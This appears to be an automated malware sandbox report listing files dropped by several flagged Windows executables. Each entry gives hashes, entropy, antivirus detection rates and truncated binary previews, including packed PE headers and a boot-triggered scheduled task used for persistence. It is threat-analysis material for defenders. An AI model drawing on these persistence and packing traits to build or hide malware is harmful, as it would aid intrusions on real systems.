                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(........2..`..........@....................................J....`... .............................................B...d...........................................................(...(................................................... .........M..................`..` ........Q.j..T..............@... `0............j.............@..@ .......U.....k.............@..@ T............ k.............@..@ @1..........$k................. ....0.......$k.............@... `....@.......&k.............@... .....P.......(k.............@... .....`..>....*k.............@... x....p..v.....k.............@..B.imports.............0k.............@....tls.................2k..................rsrc................4k.............@..@.themida.`T..........<k.............`....boot...
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):0.35901589905449205
                                                                              Encrypted:false
                                                                              SSDEEP:6:6xRoaaD0JOCEfMuaaD0JOCEfMKQmDixRoaaD0JOCEfMuaaD0JOCEfMKQmD:jaaD0JcaaD0JwQQraaD0JcaaD0JwQQ
                                                                              MD5:277CF55CF72B2677051C6AC21D61681A
                                                                              SHA1:94474E63257F124E5425C61FC883C1DBF0BD5042
                                                                              SHA-256:C0DCFC213C2ECAE5AAB7A208F3827D81062A203E2811A0C516E736620C15BCA3
                                                                              SHA-512:DF25E8437D4144E7C6F0B893789683AE57CECB160B89E52D6C83FB5AECFEBD0DEAFC04C0313E93812467BEECFD51F9C6DB57E4CCB27ECBD54BC1D54BE0831F0A
                                                                              Malicious:false
                                                                              Preview:*.>...........d.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................d.............................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7063808805984435
                                                                              Encrypted:false
                                                                              SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqr:2JIB/wUKUKQncEmYRTwh0P
                                                                              MD5:2BF4A4C093628B4411DAC2F02BA8E892
                                                                              SHA1:EC550AF1E8DD0CDEDB274AF5C9B9C410CF112AC7
                                                                              SHA-256:7BA4D948F1A8A7FDEA014BD71022FF7E728327495EDA0BFFDF147FDA8F9CE36B
                                                                              SHA-512:DAAA30464F3EF5A3960BC40693CF1C05F36878D1AD63E84C2021A126230FB6D0E376C8D7D0CBE595EFFF362A55796602B782A5275358D9E5585C541E6B59CE95
                                                                              Malicious:false
                                                                              Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd1f8570a, page size 16384, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7899359402739793
                                                                              Encrypted:false
                                                                              SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                              MD5:ABAFF68E1945842777E70AA5D41EBB4F
                                                                              SHA1:77303729E29CBA26FB6A6DDC7BAF9E35E081C7EB
                                                                              SHA-256:AFB4E1AD2DA2C9A907B34C79582A355930DE8D03FC0A6507E3C9481A18A62FE4
                                                                              SHA-512:2A2D0E41CB8D3C03F066250F094EA24436A0F9ADCD3558AF7E531880C33D9D9EBBE9CD01F6368C3A93CEC12D986A9A7C8E9FE0D9DADDE21C32DA1FA2DB1977D2
                                                                              Malicious:false
                                                                              Preview:..W.... ...............X\...;...{......................6.c.....,....{..6-...{..h.b.....,....{..6.c.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................N.i,....{..................jmiz,....{...........................#......6.c.....................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.0806122791810931
                                                                              Encrypted:false
                                                                              SSDEEP:3:hGEetYekf/d4V//aRiHKicGS//Xh4//allEqW3l/TjzzQ/t:hGdzUF4/yRCoV/Z4/Gmd8/
                                                                              MD5:699A1749D588343D408503E745089CB3
                                                                              SHA1:F21130EFF8329ADF5D9A62F1FC475461122F1E81
                                                                              SHA-256:83EDC88B75E384D6EB524CC241902E5235B15126649CC2712532D2BAABAA8100
                                                                              SHA-512:42EF5520A2FBA9138E9102F17D3B2D5D147C9501DB9BA7FF144F5B3E1F777EE599BB58FBEDD402285B30B449EEB0E173B983DDB030CDB53D3E12E27F96DF0862
                                                                              Malicious:false
                                                                              Preview:..W".....................................;...{..6-...{..,....{..........,....{..,....{..z...,....{..................jmiz,....{..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):2.4498538979390556
                                                                              Encrypted:false
                                                                              SSDEEP:48:LC0GtmEGtVldLbtQgbtzbtrBnXlbt6UNbt9ubtKa+btMkbts:LjiNiVldLZQgZzZp1Z6UNZUZwZ1Zs
                                                                              MD5:49014CD09E4C143EA1DF9FBC2F948AF7
                                                                              SHA1:A609ACAC2AFDF630D98682E1DE60E740E6649AC3
                                                                              SHA-256:878D1DC187BC6EBB9D3D7FC7F6458FECA1DB4AD708E30D3B4925A2AF8F46F061
                                                                              SHA-512:DE2F8836871C235C485DCB9F9318B1359D42C7E60204571939BAF656CCC5453B1D23A2CC0E643800158298FADA3F7E2B58B8426EAB9389223BE0B07640FF490B
                                                                              Malicious:false
                                                                              Preview:............................................................................D..............w....................eJ..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................@.V..............w............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.S.y.s.t.e.m.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...d.5.0.1.0.a.d.7.-.0.6.0.2.-.4.a.b.3.-.8.c.3.2.-.d.7.5.9.7.0.4.f.3.c.2.b...1...e.t.l...........P.P............w....................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):999
                                                                              Entropy (8bit):4.966299883488245
                                                                              Encrypted:false
                                                                              SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                              MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                              SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                              SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                              SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                              Malicious:false
                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                                                              Process:C:\Users\user\Desktop\a\audiodgse.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1510207563435464
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                              MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                              SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                              SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                              SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........
                                                                              Process:C:\Windows\SysWOW64\raserver.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:modified
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1215420383712111
                                                                              Encrypted:false
                                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\a\autolog.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):222208
                                                                              Entropy (8bit):6.471748112304272
                                                                              Encrypted:false
                                                                              SSDEEP:6144:9US35S8zC6ifmPUmH4qxOpfIsQgM5fDgUI2:73oGC6i+gfQgM10UI
                                                                              MD5:43100AE87F6E6802E3D65F8C79BA030B
                                                                              SHA1:581B6CB3F2680C968611A2E08EB5AB7D4992EEDA
                                                                              SHA-256:55A96D9729DA08198D041DBC860AB75C08A1B2004AEA757CADF526CDC128818D
                                                                              SHA-512:553E5A145628BD4D93619A908B7373DED25AD1DC9C525005A8613493CF156B8325216D05C8E2EE238A73037E927D4F59A7904BA1A8D2FBB2793F76D764D65787
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 78%
                                                                              Joe Sandbox View:
                                                                              • Filename: DHL_WAYBILL_AUTHORIZATION_FORM.xls, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F...(...(...(.+...(.-._.(.,...(..,...(..+...(..-..(.)...(...).S.(..S-...(..S....(..S*...(.Rich..(.................PE..L.....8e...............%............o.............@..........................................................................?....................................... ............................... ..@...............|............................text............................... ..`.rdata.............................@..@.data....6...P...(...:..............@....rsrc................b..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\a\autolog.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):209990
                                                                              Entropy (8bit):7.992354854919762
                                                                              Encrypted:true
                                                                              SSDEEP:3072:WTCR5KtV8sv2RqL0YkBfc4pzyDgnkA7vJGWwBZc2347Qd3FLFTtIFL5B3T:SCmso2k0YkBfhysnkA9zwxo7QXLZYVBD
                                                                              MD5:ED8F5904AE19A9287CC94A3BAB743E3E
                                                                              SHA1:02E705380AC42230CF2FA69B0C402B607BAAB9FC
                                                                              SHA-256:40F50ADB05298FB676196F4506EB6B0BCAD24CB1D5FB9074FF8DE8B548CBCB7B
                                                                              SHA-512:D5038A7725CC08D474417F8D8942A2AAF054E6FD8F274281CF0138106CB9118B64038A165F3D5DCF3B9D9895E48B88B4E3DD5A962667975FBBBE655D15974520
                                                                              Malicious:false
                                                                              Preview:.J...M.V..k..l.'.Q.n.............xn.v.HS...._......{._?..v8.0.K.~..T...Wqi.s..W.!yc.I... .J..p.......7..>`..x.......dh.D.<O...Q.-..V.4...k......0t..[U0...`jQ.....(.w...P...XTSQ.wr..G...V........u..4.>W.NQW....L.4=.....A.>....'.....M.Fu...25.MH...M.V...a,.k.l..;.. :..R.c....J.x..v.HX...._....y.{._?..v8..n.3~...$........0w......~.'...-4...E.....my...!.?VW....dh.D.....9.({...`=.W....0i.$_g$..j....T........P...Xp".M3r..H..6....(2i.Nu..4.>...[.(.....*.4=....P.u>.;..'.......F...._5..H$..M.V.%.a,.k..;.;.. :..R+c......xn.v.HS...._......{._?..v8..n.3~...$........0w......~.'...-4...E.....my...!.?VW....dh.D.....9.({...`=.W....0i.$_g$..j....T........P...XTSQ.wr..P..6.....wi..u..4.>...[.(.....L.4=....P.u>.;..'.......F...._5..H$..M.V.%.a,.k..;.;.. :..R+c......xn.v.HS...._......{._?..v8..n.3~...$........0w......~.'...-4...E.....my...!.?VW....dh.D.....9.({...`=.W....0i.$_g$..j....T........P...XTSQ.wr..P..6.....wi..u..4.>...[.(.....L.4=....
                                                                              Process:C:\Users\user\Desktop\a\setup.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1490
                                                                              Entropy (8bit):5.1015990235428035
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                              MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                              SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                              SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                              SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4125824
                                                                              Entropy (8bit):7.964202815933822
                                                                              Encrypted:false
                                                                              SSDEEP:49152:9Zt7mOXOJ79zFO/xx25/g0wDHIhQXjoLBaBhIT2iL54oU6Hhs2WtuHr1j7jEuPYM:9/hOJYrVjIhQXEiil7H6pSJpY3ZU0zK
                                                                              MD5:6C13146FEEABC071309B41335514BF99
                                                                              SHA1:127BA6047BDBC24D66A2BE4D975BFC8D8BBF3808
                                                                              SHA-256:C630FC1A9602A939621027C5C7C6BE78E598B66D86FEC0ED103EBAE22FC99577
                                                                              SHA-512:F617E7168A9B4848D2278BDC5DD0CD8986F47300D58644121ADC43C7236333BA8474309CE25BE96709103E5EE1A4F3E62471B1FC2E876C347505920965144A0E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P...#...........g.. ....#...@.. ................................?...@.................................: '.P....@'.\>............>............................................................................................. ..#.. ....!................. ..` l.....#.......!.............@..@ ......'.......".............@..B.idata... ... '.......".............@....rsrc....@...@'..@....".............@..@.themida..>...(...... $.............`....boot.........g...... $.............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685568
                                                                              Entropy (8bit):7.951830402825833
                                                                              Encrypted:false
                                                                              SSDEEP:12288:bwmi1J9z8Vll86H2O/YJGkcOCXZXr+MNIPXSQ9GWpxgJI02k+warh:bwTJ9gVj8xXeVr+MmPX/0Hq0r+L
                                                                              MD5:699B84A4A3C73A574BC51F461AD209DB
                                                                              SHA1:72E373546F81CFF47A2C9BD948751FAB35A65E2A
                                                                              SHA-256:037500EBA0044C05416217EA9936C6B9F4D9EE9A0A05D2D7860245FFFDD347B6
                                                                              SHA-512:30A1480F7DFCA36BF69A3E6C7F3976DE7FADDDC50671BCD75B4F905F93D518ACE451F21D417A45C7F2E5E725D920B92E857E1A21B90AFAE796C2A496EBF298D2
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                              Joe Sandbox View:
                                                                              • Filename: PO_4501283529.xls, Detection: malicious, Browse
                                                                              • Filename: PO_4501289523.xls, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s'8e..............0..l............... ........@.. ....................................@....................................O....................................]..T............................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B........................H.......(....J......>....................................................0..o........s....}.....r...p}.....s$...}.....s*...}.....s(...}.....s/...}.....s5...}.....s3...}......}.....(.......(.....*..0.............{....o....}.....{....r...p~....o....r...p~....o....r...p~....o....r...p~....o......r...po......r...po......o.........o....}.........Yo....}.........Yo....}....*..0...........r...p..{......?...%.r%..p.%.r)..p.%.r-..p.%.r1..p..o.......8........r5..p(......,+.r9..p.{.....
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Category:dropped
                                                                              Size (bytes):369593
                                                                              Entropy (8bit):7.892212888448179
                                                                              Encrypted:false
                                                                              SSDEEP:6144:b8LxB6j3cNeimx2YJlBNaDugXLZfc1Kd7/WAObnijZLO5UFnF14DN:rsNoJJlApcwCA+kvFFCDN
                                                                              MD5:5A7848FDBC0CA7BAB05257E730497197
                                                                              SHA1:2DBDF3371054BA248F75D35C80124A6D70FD02BC
                                                                              SHA-256:B8C61AE98E716D6953A68407927C99B395EFCACB9EBEC1A874B939D79A7E0CA4
                                                                              SHA-512:CB60AE5CBD360691DF9DD23DAE041E90C5FE366592D3E204162B77AC803E643E13AA02099FD940CBE9216BAABD0E142219228DA510C5EE04B7CC94E3E9331F3C
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 78%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@.........................................................................$u.......p.. G...........................................................................p..|............................text...f^.......`.................. ..`.rdata.......p.......d..............@..@.data....]...........x..............@....ndata...................................rsrc... G...p...H...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):487424
                                                                              Entropy (8bit):7.883998172047559
                                                                              Encrypted:false
                                                                              SSDEEP:12288:zGJrVzkDWpj3oUQ92UHURee4MxxjZO9tOGcdYnEDtyAa:Spu2bhQ92lXjxCLvcdYnEDtM
                                                                              MD5:4C28AC8168B1A3B7B861749BF14BC7A3
                                                                              SHA1:36E2FE045B1FCA157C2C363516F298341C2C8618
                                                                              SHA-256:46EE5379A2A0CC5302C8010DD913C955371DD09A571D570D375CBDF108442DF5
                                                                              SHA-512:9EF31D3A6D71CF85A683242C38B0253143C05B9C71E33DDB6287543E6EFB13743558BBF1ADE14CE4FB607FF962363471872AEC77A54AB0E3EEF48B2C62F1E8B3
